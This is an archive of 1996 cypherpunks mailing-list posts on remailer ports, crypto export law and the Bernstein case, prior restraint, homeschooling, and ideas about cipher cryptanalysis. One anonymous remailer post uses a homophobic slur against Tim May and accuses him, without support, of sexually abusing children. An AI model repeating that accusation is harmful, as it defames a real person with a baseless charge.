> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Mon, 23 Sep 1996 12:28:49 +0800
To: Adam Shostack <adam@homeport.org>
Subject: Re: Macintosh Mixmaster port...  Who's doing it?
In-Reply-To: <199609222016.PAA00572@homeport.org>
Message-ID: <199609230210.VAA01661@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


In <199609222016.PAA00572@homeport.org>, on 09/22/96 at 03:16 PM,
   Adam Shostack <adam@homeport.org> said:



>	However, there is a real need for things like Mixmaster/DOS,
>the WinSock remailer, and other tools that allow the average home user
>to set up a remailer without taking the several days or more to
>install a new OS on their system.

There is a Dos version available. It is being used by Private Idaho for its Mixmaster
Support. I am looking into doing an OS/2 port of Mixmaster to be used by my OS/2
front End.

--
-----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Merlin Beta Test Site - WarpServer SMP Test Site

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
-----------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Mon, 23 Sep 1996 17:55:32 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: Informal Renegotiation of the Law
In-Reply-To: <199609230243.VAA00509@smoke.suba.com>
Message-ID: <Pine.3.89.9609222127.A24532-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain





On Sun, 22 Sep 1996, snow wrote:
>      I would agree that parents can do as good or better at _most_ subjects 
> thru about the 3rd or 4th grade, and I do agree that most of todays schools 
> are shit, however there is one area--social skills--that homeschooling 
> simply can't compete. Children need to learn how to interact with one another
> in groups larger than a family unit. I don't think that homeschooling can
> accomplish this nearly as well as the public (or private) schools could. 

I understand that many parents that homeschool belong to organizations
that provide for meetings twice a week in which the children so educated
in a certain area get together.  Homeschooling does not have to stand in
the way of a normal socialization process. 

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "steven ryan" <sryan@reading.com>
Date: Mon, 23 Sep 1996 12:19:05 +0800
To: cypherpunks@toad.com
Subject: Re: Snake-Oil FAQ
Message-ID: <3.0b15.32.19960922214147.00551e40@reading.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:27 AM 9/22/96 -0700, you wrote:
>My view is that people interested in buying and using crypto are either
>bright enough to learn, or are not. A "Snake Oil FAQ" is largely
>unnecessary, for either category. For the first, because they're bright.
>For the second, because they're not.

My view is that there is a large third group of people who are bright
enough to learn, but don't have the time or inclination to read books or do
extensive research on the subject. There are a lot of people using PGP for
the wrong reason, not because they read the books or did the research. Nor
do they even understand how it works as opposed to how it is used. They are
using it because they cruised the net and read good things about it or
heard it was cool. 

A Snake Oil Faq could help prevent these people from choosing  wrong
products. It would also be very helpful to have all the arguments in one
place in one concise faq. Before I joined this list and read Applied
Cryptography I was in a discussion in a previous job about securing one of
our products. The programmer wanted to protect the key with a convoluted
series of transpositions. I knew it was dumb but couldn't successfully
argue the point why. A faq would have been helpful.

There a lot of people with a casual interest in crypto who will remember
that there is a faq on bad crypto. When the time comes they may be able to
use those arguments to help avoid the use of bad crypto.

Steven 

------------------------------------
Steven Ryan - Reading Access - sryan@reading.com
PGP Fingerprint: E8 A2 C5 A2  7A C4 77 93  0A 1B 1D C6  B9 2F 36 9B
Finger me for my PGP public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 23 Sep 1996 17:09:00 +0800
To: adamsc@io-online.com
Subject: Re: Informal Renegotiation of the Law
In-Reply-To: <19960918160153703.AAC88@IO-ONLINE.COM>
Message-ID: <199609230243.VAA00509@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


Mr. Adams wrote:

> On Sun, 15 Sep 1996 17:54:49 -0500 (CDT), snow wrote:
>>> For example, you will not read anywhere that compulsory education laws have
>>> rare.  Compulsory education has been effectively repealed by the actions of
>>> refusenicks in both the subject population and the enforcement population.  
>>     Their children are still getting educated. Not thoroughly enough in 
>>some cases, but educated in the basics. 
>It has always seemed somewhat amusing that we will have a) a widespread opinion
>that homeschooling is of lesser value and b) numerous studies, surveys,
>testimonials, reports, etc, that show what a rotten job public education is
>doing*.   This raises the question of how anyone even remotely concerned with
>their children's welfare could do worse. . .    Yet another unexplained mass
>insanity.

     I would agree that parents can do as good or better at _most_ subjects 
thru about the 3rd or 4th grade, and I do agree that most of todays schools 
are shit, however there is one area--social skills--that homeschooling 
simply can't compete. Children need to learn how to interact with one another
in groups larger than a family unit. I don't think that homeschooling can
accomplish this nearly as well as the public (or private) schools could. 

     I also don't think this is as important as, say Math, Science, or
English. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 23 Sep 1996 15:50:30 +0800
To: cypherpunks@toad.com
Subject: Re: Go away CIA
In-Reply-To: <Pine.BSD/.3.91.960922192936.9708B-100000@froglit.scitele.com>
Message-ID: <Pine.LNX.3.95.960922214247.980B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 22 Sep 1996, Shane Brath wrote:

> On Sat, 21 Sep 1996, Wearen Life wrote:
> 
> > I wont be suprised if they where ALSO watching who was visting your page.
> > I think now is the time to start looking in your hard drive or floppy
> > disk for anything that my incrimanate you. (did i spell that right)?
> 
> My 2 cents. 
> 
> But how would they go about globaly watching who goes to your URL, unless 
> they hack into your server and look at the log, or have a network sniffer 
> at a access point feeding you?

That may have been what they were trying to do when trying to snarf the
passwd file.  I can't imagine why they would want to do this -- there's nothing
illegal about mirroring the page.  Maybe I just lack imagination...

Mark
- -- 
PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMkXrjizIPc7jvyFpAQEcYQgApFV124tsvqSlqPokbGTc1LC49IKDb5zs
RPJvGrwMdVAOwg7BY0g2M1uhD8MhD7H72ZYFqKkZfOCvZ+kkwqzSqguzRLo2clIb
oJVqCYsA8QYDodKnqRoCGi9huBhvqQ8nLJSKIsPHfhYyvP9AnUjwHnVVCzPLL7DX
hDbRc5ZISBrTh0Hxo2+qsB/GIR4JYNLx0ljL1uloMLDxCIso74EUojXl3tNsiGlz
Ym4jq9jFYqE4NkJ+gluqhxjPVcpoqcRCxQG5EXAi5Q2RJ4ANEKUzu98FyGynUX81
CICwL0UxYaGNaoN9BrpH9tzofEGCLz+k6oLzWeLODYxkpvlcNUY7Cg==
=q1Lq
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 23 Sep 1996 13:44:07 +0800
To: adamsc@io-online.com
Subject: Re: Workers Paradise. /Political rant.
In-Reply-To: <19960918160153703.AAE88@IO-ONLINE.COM>
Message-ID: <199609230247.VAA00522@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


Mr. Adams wrote:
> On Sun, 15 Sep 1996 17:13:53 -0700, Dale Thorn wrote:
>>> And that's good. The world population really should go back to around
> say, explaining an integral. (or even an equation for that matter)
> As a side note, how about some real welfare reform:  mandatory birth control
> (and pay for that; it's *much* cheaper) and benefits go DOWN for additional
> births.

<whine>
 But, But, But...What about the <i>Children</i>?
</whine>

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will rodger <rodger@interramp.com>
Date: Mon, 23 Sep 1996 14:49:23 +0800
To: mcguirk@indirect.com
Subject: RE: Where to write crypto?
Message-ID: <199609230203.WAA03418@interramp.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----



 On Sat, 21 Sep 1996, Dan McGuirk wrote:

	>>| > If I want to go to a country outside the United States to write
	>>| > cryptographic code that will be freely distributable, what's the best
	>>| > place to go?
	>>|
	>>| Or, on the other hand, is there no way that a U.S. citizen can legally do
	>>| this?
	>>
To which Adam Shostack replied:


	>>	Thats not clear.  The ITARs seem, on their face, to create a
	>>prior restraint on speech based on its content, and forbid Americans
	>>the right to leave the country to pursue their livlihoods.  The odds
	>>of geting persecuted seem pretty low.

Could be. But prominent crypto atty. Ken Bass told me he thought such actions would be vigorously prosecuted - quicker than you could say "global proliferation." Thing to notice here: no prominent cryptographer in the US has come forth and said "yes, I helped write strong crypto abroad." Which isn't to say most of them aren't  traveling abroad frequently these days - take, e.g. the presence of M. Blaze, W. Diffie et al. at the OECD in Paris this week.


	>>	As to the (predictable) comment that I'm not doing this, I'd
	>>be happy to entertain offers of crypto work that are not in the US,
	>>possibly leading to me being a test case.
	>>

Call before you do, Adam; I'd kill to have that story first...


Will Rodger
Washington Bureau Chief
Inter@ctive Week

-----BEGIN PGP SIGNATURE-----
Version: 2.9

iQEVAgUBMkXvQ0cByjT5n+LZAQGLyQf8Ctlf2JVeYI8Ws47YovJ0fhF3nzf9ihLd
nHzZNqGpEVGVcOXYw2u84jV68y9Y7M3vdo/BDZCA3G0T8zZopmpiNZHgblh15ndP
jPdYRkz4+7NnEn/Tz/1LQS6SVp/LA1G/qoCCNqGuYneSVkZxxsoeoEp9ZdCMhDE9
iq7IEI+pyY44vnSWvo65YNQZXt4thf94E94pspoNWC+DNwRDj8BkK28MpM3vduqD
i/cViVUcKOLVg/b31HTVrq0rwWClfD0+J4a4F8AcGcf4SwedGCVaUAdSWRw0FQTJ
6AioCSd5Cs/g9k+xxaqRMzExJcBphwnlCZvA+qpgjY+KdagaEqJwGA==
=vyTv
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 23 Sep 1996 13:05:19 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Evolving algorithm for faster brute force key searches?
In-Reply-To: <ae6af5030202100433cd@[207.167.93.63]>
Message-ID: <199609230314.WAA01337@homeport.org>
MIME-Version: 1.0
Content-Type: text


Timothy C. May wrote:

| With some weak ciphers, this might work. I think Schneier makes some
| comments about who's looked at this. But weak ciphers are not too
| interesting.

	At the most recent Crypto, someone mentioned that FEAL is
useful because just about any new attack you can think of works well
against it.  I think it was Susan Langford.

	Weak systems are thus useful for research and training
purposes.  I suspect Tim is on the money with a genetic algorithim
having a flat `fitness landscape,' but there may be something that a
human misses which an evolved algorithim finds.

	Also, it may be possible to evolve something against a
reduced round version of a cipher (using a training space that is not
flat) that will still work better than brute force against a full
system.  If you have cycles to spare, it might be an interesting
avenue of research.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 23 Sep 1996 16:53:34 +0800
To: cypherpunks@toad.com
Subject: Re: Bernstein hearing: The Press Release
Message-ID: <199609230537.WAA15530@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:15 PM 9/22/96 -0700, Rich Burroughs wrote:
>At 04:39 PM 9/21/96 -0800, Jim Bell wrote:
>>At 02:03 PM 9/18/96 -0700, John Gilmore wrote:
>
>[snip]
>>>*       Any legal framework that allows a government bureaucrat to 
>>>censor speech before it happens is an unconstitutional prior restraint.  
>>>The government is not allowed to set up such a drastic scheme 
>>>unless they can prove that publication of such information will 
>>>"surely result in direct, immediate, and irreparable damage to our 
>>>Nation or its people" and that the regulation at issue is necessary 
>>>to prevent this damage. 
>>
>>At the risk of being a devil's advocate, let me suggest that you are 
>>conceding too much even with the preceding paragraph.  The 1st amendment 
>>says nothing about preventing speech  which (even admittedly) would result 
>>in "direct, immediate, and irreparable damage to our nation or its people."
>[snip]
>
>Jim, that's a quote of Potter Stewart from the Pentagon Papers case, if I'm
>not mistaken.  It's not written in the Constitution, but Supreme Court
>precedent is the next best thing as far as con law goes.

Under the circumstances, I think it would be wise to actually EXPAND our 
protections.  A lot has happened in the last 25 years.  If a reasonably 
extensive list were made of situations and circumstances where the wool was 
pulled over the eyes of Americans by government...and how subsequent 
developments showed that these things were best revealed THEN and not 
later...it could be reasonably argued that there is no or almost no area 
where the "direct, immediate, and irreparable damage" exception is likely to 
realistically exist.

You should point out that the Pentagon Papers case was decided 
notwithstanding an extraordinarily generous set of assumptions common in 
Cold-War America about the power and authority of government, many if not 
most of which would be no longer considered valid.  

Put the opposition on the spot:  Insist that they provide a substantial 
number of examples where speech was expected, was attempted to be restricted 
by gov't under such an exception, where that speech actually occurred 
(either by refusal of the court to intervene or by refusal of a party to the 
case to restrict his speech), and show how this actually caused any "direct, 
immediate, and irreparable damage."

In the absense of such examples, it is reasonable to presume that, 
generally, they don't exist or are so rare as to be ignorable.  (For 
example, in the Progressive case from the middle 70's, the gov't dropped its 
case.  What harm occurred?)

>The government can restrict speech in time, place or manner, according to
>the courts.  Restricting content is more difficult, and places a much
>heavier burden on the gov.
>
>To expect people writing about and arguing the case to completely ignore
>the existing case law is foolish, IMHO.

I am _not_ suggesting that case law be "ignored."  Rather, point out that 
the case law, even though it goes in your favor, was still decided in a 
thoroughly biased atmosphere and therefore further reductions in government 
authority are appropriate.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Mon, 23 Sep 1996 16:56:08 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Bernstein hearing: The Press Release
In-Reply-To: <199609212340.QAA07773@mail.pacifier.com>
Message-ID: <199609230544.WAA08826@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


The EFF press release on the Bernstein hearing said:
> >*       Any legal framework that allows a government bureaucrat to 
> >censor speech before it happens is an unconstitutional prior restraint.  
> >The government is not allowed to set up such a drastic scheme 
> >unless they can prove that publication of such information will 
> >"surely result in direct, immediate, and irreparable damage to our 
> >Nation or its people" and that the regulation at issue is necessary 
> >to prevent this damage. 

Jim Bell said:
> At the risk of being a devil's advocate, let me suggest that you are 
> conceding too much even with the preceding paragraph.  The 1st amendment 
> .... [long discussion] ....

The wording there is taken directly from the controlling Supreme Court
case, which I believe is the Pentagon Papers case.  The example used
in that case was the departure date and route of a ship carrying US
troops to war.  The government could sue people who threatened to
publish such information, prior to publication, and have some chance
of winning the case.  It's not a guarantee, just a pre-qualification.
The idea is that if they CAN'T show such a danger, they have NO chance
of winning.

The Supreme Court didn't even say that publishing the sailing dates
of troop transports *could* be prior-restrained.  What they said was
that they would consider such a case if it ever got to them.  Cases
which didn't meet such a high standard should just be taken care of
by the lower courts.

We aren't conceding anything.  We're pointing out that the
export control law doesn't even meet the standard that the supreme
court has already set for laws like this.

You might want to hold the government to a higher standard than the
threshold they set in the Pentagon Papers case.  Myself, I think they
did an excellent job, especially considering that it was wartime and
that the document the New York Times wanted to publish was classified
but had been leaked.  They didn't permit the government to
prior-restrain publication of it ANYWAY.  The "direct, immediate and
irreperable damage" phrase was them merely trying to think up a
hypothetical document that they MIGHT allow prior restraint to apply
to.

My opinion on criminal and civil law is quite different from the
Supreme Court's.  Still, I am working on having the Supreme Court
confirm my opinion in a particular area -- that of the crypto export
control laws.  I'd rather bring them a nice simple case that focuses
on just one thing.  It's a lot easier for them to decide about the 
thing I really care about, if it doesn't bring in extraneous factors
like exactly where the line should be for permitting prior restraint.

The Supreme Court would ignore the prior restraint line issue anyway,
because it isn't a factor in this case.  The government isn't arguing
that they have the right to prior-restrain us because of direct,
immediate and irreperable damage.  Instead they argue that the
publication itself is being controlled only for its function, not for
the content of the publication, and therefore in controlling the
function, they can "incidentally" control the publication.  And if
they can legitimately control the speech, then what's all this fuss
about prior restraint when it's punishable speech anyway?  This is the
set of issues that the Supreme Court would tend to look at.

	John

PS:  I'm not a lawyer, and I didn't ask a lawyer to read this over,
so I might have some parts wrong.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 23 Sep 1996 12:26:35 +0800
To: cypherpunks@toad.com
Subject: provably hard PK cryptosystems
Message-ID: <199609222158.WAA00325@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



extracting from part of another thread...

Dimitri Vulis <dlv@bwalk.dm.com> writes:
> Adam Back writes:
> > [...] I think I remember that you posted some time ago a way to have
> > two plausible decryptions for one ciphertext, to enable things like
> > duress keys, in terms of RSA.  The problem with this, however is
> > that RSA is currently very slow to use in its pure form for
> > messages.
>
> I don't recall this one... My feeling about RSA is that one of these
> days there will be a breakthrough allowing much faster factorization
> (either through a better algorithm on a conventional computer, or by
> a practical quantum computer) and then all the codes based on
> factorization will become essentially plaintext. It's time to start
> looking for other hard problem to base PKC on.

I'm not sure about quantum computers, some people who know much more
about particle physics than I do seemed initially sceptical, and
didn't think it was doable.  However I have read some optimistic
sounding news clippings (on the list) which sounded as if things are
progressing well, with techniques being found using redundancy to get
around what were earlier problems of reliability.  Is this accurate
reporting (thinking of garbled stories by over enthusiastic
journalists)?  I'd be interested to hear opinions from anyone who does
know about particle physics about the likihood of practical quantum
computers being practical in the next 20 years or so.

RSA has always had problems with two pitfalls in any proof of its
hardness: no proof that RSA is as hard as factoring, and no proof that
factoring is hard.  Rabin and variants of it at least have the proof
of being as hard as factoring.

You mentioned your opinion that a vastly better factoring algorithm
may yet be found.  What about the possibility of finding proof of a
useful lower bound for the complexity of factoring, do you have any
thoughts on the likelihood of this being achieved?  That would be a
very significant result, and in the absence of a quantum attack would
be as good as it gets. It would allow you to make realistic
calculations about physical limits of attacking it, in a similar manner
to the entropy calculations possible for brute force of symmetric
ciphers.  (Heat death of the sun before a solution even if every
particle was part of hardware key cracking computer type arguments).

One other area that did sound promising was some kind of mapping
problem in n dimensional tiling that Tim was discussing at a physical
meet while I was over in the US.  A news clipping posted to
cypherpunks a short time ago was talking about a researcher who had
constructed a crypto system related to the problem of finding paths in
a tiling problem (sounded like the same problem).  The interesting
part was that the researcher was reported as having a proof of
hardness.  Similarly is this being reported accurately?

> E.g., does anyone know of any progress made on public-key
> cryptosystems based on the word problem in semigroups, described in
> Neal Wagner and Marianne Magyarik, _A public key cryptosystem based
> on the word problem_, Advances in Cryptology: Proceedings of Crypto
> '84, G. R. Blakley and D. Chaum, eds., Lecture Notes in Computer
> Sciences #196, Springer Verlag, 1985, and also mentioned in Wayne
> Patterson, _Mathematical Cryptology for Computer Scientists and
> Mathematicians_, Rowman and Littlefield, 1987?

Not familiar with the problem.  Is it something you could explain
briefly, or are there any on-line papers on the subject?

> >From what I neard, NSA tried very hard to implement it and failed,
> and the Soviets actually built a cryptosystem similar to what they
> described. I tried to duplicate what the Soviets supposedly did, but
> without success.

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scottauge@aol.com
Date: Mon, 23 Sep 1996 13:51:27 +0800
To: johnbr@atl.mindspring.com
Subject: Re: Internet File System?
Message-ID: <960922232858_108284943@emout01.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


This is actually a good idea.

There is something in the UNIX world called NFS (network file system).  It is
based on TCP/IP sockets.

I do not know if you know anything about UNIX, but the file system used does
not have logical drives (like a: or b: etc), just one huge tree that can span
across many harddrives on many computers, thus making them all look like one.
 NFS helps to connect the other computer's file systems to the network tree.

I think it is pretty cool...

There is an RFC for it, though I do not remember the number.  I read it once
cuz I was planning a windows 95 version so I can hook my laptop up to my UNIX
computers, but I found software to do it with and was like, why should I kill
time on it when I could be using it to make money!  It is very complete and
designed to be implemented in C.  Since Java is so close to C, a port could
probably be made fairly easily (provided ya know something about writing file
systems/operating systems ;) )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim McCoy <mccoy@communities.com>
Date: Mon, 23 Sep 1996 18:27:12 +0800
To: cypherpunks@toad.com
Subject: Re: Evolving algorithm for faster brute force key searches?
In-Reply-To: <ae6af5030202100433cd@[207.167.93.63]>
Message-ID: <v03007800ae6bed0079e3@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack <adam@homeport.org>
[...]
>	Weak systems are thus useful for research and training
>purposes.  I suspect Tim is on the money with a genetic algorithim
>having a flat `fitness landscape,' but there may be something that a
>human misses which an evolved algorithim finds.
>
>	Also, it may be possible to evolve something against a
>reduced round version of a cipher (using a training space that is not
>flat) that will still work better than brute force against a full
>system.  If you have cycles to spare, it might be an interesting
>avenue of research.

While a well-designed algorithm has a flat search space in the case of
a single instance of a particular ciphertext/plaintext, this is not
necessarily the case for repeated encryptions using the same key and
possibly for other examples (hence differential cryptanalysis, etc.)
If there is a way to break a system that is less than a brute-force
search of all possible keys then the landscape is not flat.  The hard
part with making such discoveries using evolutionary methods is that
even if the landscape is not completely flat the positive and negative
reinforcement needed to perform selection in such an environment almost
always necessitates that the fitness function be crafted with this in
mind by the researcher and few evolutionary programming researchers know
anything about crypto.

While there are a few strikes against such research (as the oft repeated
"flat landscape" phrase shows) I would not let the current state of the
art in this area disuade anyone interested.  Most of the research done
so far has been done by people who either knew little about crypto or
little about evolutionary programming.  There are also other areas of
crypto relevance which may prove more amenable to evolutionary programming
methods, like factoring...

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim McCoy <mccoy@communities.com>
Date: Mon, 23 Sep 1996 18:35:47 +0800
To: cypherpunks@toad.com
Subject: Re: Bernstein hearing: The Press Release
In-Reply-To: <Pine.LNX.3.95.960922143515.533A-100000@gak>
Message-ID: <v03007801ae6bf1788684@[204.179.128.16]>
MIME-Version: 1.0
Content-Type: text/plain


Brian Davis <bdavis@thepoint.net>
[...]
>Constitutional literalists take note:  the First Amendment says nothing
>about what the executive branch or the states can do ....

The states are prohibited through the 14th Amendment via the
Slaughterhouse cases, the ability of the executive branch to
violate due process is questionable (from a legal viewpoint, not
a practical one...the President cannot order you placed in jail
unless you have broken a law which requires congress to have
made the law in the first place...)

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Mon, 23 Sep 1996 16:54:06 +0800
To: Scottauge@aol.com
Subject: Re: Internet File System?
In-Reply-To: <960922232858_108284943@emout01.mail.aol.com>
Message-ID: <Pine.BSF.3.91.960923004104.2636B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 22 Sep 1996 Scottauge@aol.com wrote:

> There is something in the UNIX world called NFS (network file system).  It is
> based on TCP/IP sockets.
> 
> I do not know if you know anything about UNIX, but the file system used does
> not have logical drives (like a: or b: etc), just one huge tree that can span
> across many harddrives on many computers, thus making them all look like one.
>  NFS helps to connect the other computer's file systems to the network tree.
> 
> I think it is pretty cool...

Yeah, real secure too.  ;)  ;)  ;)

- r.w.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Mon, 23 Sep 1996 18:42:39 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Mercenaries
In-Reply-To: <ae65693e0e021004fa1e@[207.167.93.63]>
Message-ID: <Pine.BSF.3.91.960923004212.29450C-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Sep 1996, Timothy C. May wrote:

> At 9:40 PM 9/17/96, William Knowles wrote:
> 
> >What about the French Foreign Legion? or the Volunteers for Israel,
> >which isn't really a fighting force, but Americans can help keep
> >the Israeli army at a ready state.
> 
> Israel is one of several states which the U.S. allows dual citizenship
> with. For political reasons, because of America's extermination of the Jews
> in WW II (Whoops, we were on the other side...so why do we have such a cozy
> deal with Israel, but not with, say, France? Beats me. Politics.)
> 
> Brian Davis, our former Prosecutor, can tell us how likely it is that any
> person would be charged and brought to trial for being a paid mercenary for
> some small country in the Third World. The CIA is often behind such
> mercenaries, so national security issues could make the issue murky.

Exceedingly unlikely.  A variety of practical problems.  If you came up 
to a U.S. Attorney to show him your picture on the cover of The Zaire Daily 
News as mercenary of the week and spit in his face, you'd get prosecuted.

For spitting in the prosecutor's face.

On a slightly more serious note:  you'd only get prosecuted in someone at 
Main Justice (i.e. in Washington) wanted you prosecuted.

EBD


> 
> But the real reason such prosecutions are rare is that the government
> realizes how Orwellian it sounds to say:
> 
> "You are being prosecuted because you were a mercenary for Oceania in its
> war with Eastasia. While Oceania was once our ally in our battle with
> Eastasia, and we endorsed and financed your role as a mercenary, we became
> allies with our great friend Eastasia and are now in a state of war with
> the tyrants of Oceania."
> 
> 
> >Explicit isn't a dirty word, Or is it?
> 
> AOL has declared "explicit" to be a Banned Word, along with "pissant,"
> "craps," and "cock," and numerous other such ordinary words. (So much for
> mentioning their pissant policies, a game of craps in Las Vegas, or a male
> chicken.)
> 
> --Tim May
> 
> We got computers, we're tapping phone lines, I know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Mon, 23 Sep 1996 16:17:00 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: Bernstein hearing: The Press Release
In-Reply-To: <Pine.LNX.3.95.960922143515.533A-100000@gak>
Message-ID: <Pine.BSF.3.91.960923010916.29450G-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 22 Sep 1996, Mark M. wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> On Sun, 22 Sep 1996, Bill Stewart wrote:
> 
> > The First Amendment does not contain the phrase "national security"
> > anywhere in it.  It does, however, begin with a rather explicit
> > "Congress shall make no law" which it applies to a bunch of things.
> > However, the body of the Constitution does say there should be a
> > Supreme Court, and the Supreme Court has (fairly reasonably) given itself
> > the job of deciding what's Constitutional and what's not.
> > The Supremes have, over the years, made a bunch of generally outrageous
> > decisions about what kinds of speech are protected by the First Amendment
> > and what kinds aren't, though their opinions have been gradually
> > improving since some of the really appalling ones earlier in the century.
> 
> I did a little searching and couldn't find anything about a national security
> exception in the Consitution.  It's already a stretch to claim that disclosure
> of information vital to "nation security" is treason.  The Espionage Act, which
> is so obviously unconstitutional, seems to make "harmful" speech illegal.


There isn't such a clause.  The allowed restrictions were developed in 
case law.

Constitutional literalists take note:  the First Amendment says nothing 
about what the executive branch or the states can do ....

EBD

> 
> Mark
> - -- 
> PGP encrypted mail prefered.
> Key fingerprint = d61734f2800486ae6f79bfeb70f95348
> http://www.voicenet.com/~markm/
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.3
> Charset: noconv
> 
> iQEVAwUBMkWIpCzIPc7jvyFpAQFJFggAi9H/vbu9GN21rbjJnhyUoHy3TEZ+1ZsI
> in88Z9zqCuFyv28Q+vqKgTl0pvsBQNps1Ji4GXCv2LMaxGCbuzsvDLFxiqqVF8ev
> fC7MB7fl1r33ik1QCngygoPonb9yj79Ok0oKgms6sNNsVEkGe3hn5QHahNc7TRJX
> lzkHJ6ufVI/yNmh3KtqwWlAjE1vZ8esOrExRpiszrQDK1gDlNRFqA0Yor3bsDrlE
> wedkFUioEbK0Xv24ajeU0s9dYgkDt25OxUENT2ddnqzD1lfVOrVLx1zmroMl4mh1
> MC1D2dd8ErN25/V83phFLbpzNA7EPKYQyNZtzOY28uD/XpoqziGS1g==
> =CrOM
> -----END PGP SIGNATURE-----
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dustbin Freedom Remailer <dustman@athensnet.com>
Date: Mon, 23 Sep 1996 17:38:19 +0800
To: cypherpunks@toad.com
Subject: A daily word of caution in reference Tim C[unt] May
Message-ID: <199609230540.BAA16639@godzilla.athensnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim C[unt] May is not only as queer as a three dollar bill, but he is also into 
having sex with children.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 24 Sep 1996 19:01:35 +0800
To: cypherpunks@toad.com
Subject: Re: Bernstein hearing: The Press Release
Message-ID: <ae6c0d03000210049e3a@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:23 PM 9/23/96, Declan McCullagh wrote:
>On Sun, 22 Sep 1996, Timothy C. May wrote:
>
>> If California were to, say, ban speech critical of women's or homosexual's
>> rights, would not the First Amendment trump this attempt?
>
>Not necessarily.
>
>The Supreme Court has upheld Title VII's ban on workplace "harassment."
>The Court said it occured when "discriminatory intimidation, ridicule, and
>insult" in a workplace create an uncomfortable "working environment."
>
>Then there's public accomodation law, under which the (I recall) Greek
>owner of a privately-operated diner was held liable for using the word
